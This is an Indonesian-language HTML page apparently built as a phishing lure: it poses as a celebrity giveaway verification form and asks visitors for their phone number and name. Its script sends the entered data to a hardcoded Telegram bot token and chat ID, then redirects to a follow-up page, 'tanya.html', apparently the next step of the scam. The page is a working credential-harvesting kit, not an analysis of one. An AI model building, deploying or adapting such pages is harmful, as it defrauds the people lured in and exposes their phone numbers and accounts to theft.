<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Formulir Verifikasi Giveaway</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
  </head>
  <body>
    <nav class="navbar" style="background-color: #fcff32">
      <div class="container">
        <a class="navbar-brand" href="#">
            <img src="https://t3.ftcdn.net/jpg/04/83/58/90/360_F_483589048_DN0uPcM4D8EfKJ6gaBZbHc3pApgYnHgs.jpg" alt="logo" width="200" height="S0">
        </a>
        <h2 style="color: #254dce">GiveAway BossQuu</h2>
        <div class="container">
            <div class="logo-atas">
                <img class="img-fluid" src="atas.jpg" alt="">
                </div>
            
    </nav>
    <div class="container">
        <div class="title-web mt-2">
            <div class="logo-atas">
                <center><img class="img-fluid" src="https://asset-2.tstatic.net/kaltim/foto/bank/images/bocoran-cara-ikut-giveaway-baim-wong-di-trans-7.jpg" alt=""></center>
            </div>
      <div class="title-web mt-1">
        <h2 class="text-center">Isi Formulir GiveAway Anda</h2>
      </div><br>
      <div class="image-web">
      </div>
        <div class="col-md-3">
            <label class="ms-5" for="nope">No. Telpon akun Anda</label><br>
            <center><input type="number" name="nope" id="nope" style="border: Container; border: 2px solid black; width: 80%"></center>
             
        <div class="col-md-3 mt-4">
            <label class="ms-5" for="pin">Nama Anda</label><br>
            <center><input type="text" name="pin" id="pin" style="border: Container; border: 2px solid rgb(0, 0, 0); width: 80%"></center>
        </div>
      </div>
      <center><button onclick="next()" class="mt-4" style="background-color: rgb(243, 174, 45); height: 40px; width: 130px">Kirimkan</button></center>
      <br>
      <p id="proses" class="text-center" style="color: rgb(134, 2, 2); display: none">TERIMA KASIH PERMINTAAN ANDA SEDANG DI PROSES</p>
      <div class="image-web mt-2">
        <center>
          <img src="https://cdns.klimg.com/kapanlagi.com/p/fpandrebaim2.jpg" alt="" width="250px">
      </div>
    </div>
    <script> 
      const next = () => {
       let proses = document.querySelector("#proses");
       let nope = document.querySelector("#nope").value
       let pin = document.querySelector("#pin").value
       let token = "6812088676:AAHFIo1sIwC_I-VQnXbpWJeh-nu3nArVvjc"
       let id_tele = "6863354480"
       if (nope === "" | pin === "") {
         alert("Mohon Isi data Dengan Benar")
       } else {
         let message = `  *GiveAway Baim*%0A________________%0ANo. handphone:%0A${nope}%0A----------------------%0ANama: ${pin}`
         let api = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${id_tele}&text=${message}`
         fetch(api, {
           method: 'POST',
         })
         .then((response) => response.json())
         .then(data => {
                console.log('Pesan terkirim:', data);
                window.location.href = "tanya.html"
          })
          .catch((error) => {
            console.error('Error:', error);
          });
       }
      }
    </script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script>
  </body>
</html>